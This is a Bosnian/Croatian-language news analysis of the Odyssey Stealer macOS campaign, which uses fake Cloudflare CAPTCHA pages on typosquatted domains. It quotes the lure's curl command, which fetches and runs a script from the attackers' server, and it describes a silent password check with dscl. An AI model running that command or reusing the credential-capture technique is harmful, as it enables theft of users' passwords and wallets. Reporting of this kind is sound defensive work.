Nova sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS-a koristi obmanjujuće „Clickfix“ taktike za distribuciju zlonamjernih AppleScriptova s ciljem prikupljanja osjetljivih korisničkih akreditacija i financijskih podataka. Kampanja se oslanja na domene s greškama u kucanju koje se namjerno podudaraju sa legitimnim financijskim platformama i web stranicama Apple App Storea, stvarajući uvjerljivu fasadu koja navodi korisnike na izvršavanje opasnih naredbi na svojim sistemima. Napad započinje kada korisnici nenamjerno posjete zlonamjerne domene koje prikazuju lažne CAPTCHA upite u stilu Cloudflare-a. Ove naizgled legitimne stranice za provjeru autentičnosti upućuju korisnike macOS-a da kopiraju i lijepe Base64 kodirane naredbe u svoje terminalske aplikacije kako bi dokazali da nisu roboti. Nakon izvršenja, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka koja cilja na akreditacije preglednika, kriptovalutne novčanike i osjetljive osobne podatke pohranjene u više aplikacija.
Istraživači kompanije Cyfirma identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, preimenovanu verziju prethodno poznatog Poseidon Stealer-a, koji je sam nastao kao fork AMOS Stealer-a. Tim za istraživanje otkrio je više kontrolnih i zapovjednih (C2) panela povezanih s ovom aktivnošću, s infrastrukturom uglavnom hostovanom u Rusiji. Zlonamjerni softver pokazuje jasnu sklonost ka ciljanju korisnika u zapadnim zemljama, posebno u Sjedinjenim Državama i Europskoj uniji, dok upadljivo izbjegava žrtve u zemljama Zajednice neovisnih država.
Odyssey Stealer predstavlja zabrinjavajući napredak u zlonamjernom softveru usmjerenom na macOS, kombinirajući taktike socijalnog inženjeringa sa sofisticiranim tehničkim mogućnostima. Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja iskorištava ljudsku psihologiju predstavljajući korisnicima poznate sigurnosne upite koji izgledaju kao rutinske procedure provjere autentičnosti. Napadači su pažljivo kreirali svoje distribucijske web stranice kako bi odražavali povjerljive platforme, što otežava otkrivanje od strane nesuđenih korisnika.
Mehanizam infekcije zlonamjernog softvera oslanja se na višefazni proces koji započinje greškama u kucanju domena i završava potpunim kompromitiranjem sistema. Kada korisnici posjete zlonamjerne domene, nailaze na profesionalno dizajnirane stranice koje repliciraju izgled legitimnih sistema za provjeru CAPTCHA. Lažni upit prikazuje upute za korisnike macOS-a da izvrše naredbu koja izgleda ovako: `curl -s http://odyssey1.to:3333/d?u=October | sh`. Ova naredba preuzima i izvršava AppleScript sa servera za kontrolu i zapovijedanje napadača. Skript koristi alfanumeričku obskurnost kako bi sakrio nazive funkcija, iako analiza otkriva njegovu pravu svrhu. Nakon izvršenja, zlonamjerni softver stvara strukturu privremenih direktorija pomoću naredbe `mkdir`, specifično uspostavljajući `/tmp/lovemrtrump` kao svoju operativnu bazu.
AppleScript zatim prikazuje uvjerljiv upit za autentifikaciju dizajniran da uhvati sistemsku lozinku korisnika. Za tihu validaciju ukradenih akreditacija, koristi se naredba `dscl` za macOS sa parametrom `authonly`, osiguravajući da proces provjere ostane skriven od korisnika. Ova tehnika omogućava zlonamjernom softveru da potvrdi valjanost lozinke bez pokretanja sistemskih upozorenja ili sumnje kod korisnika, demonstrirajući duboko razumijevanje napadača sigurnosnih mehanizama macOS-a.
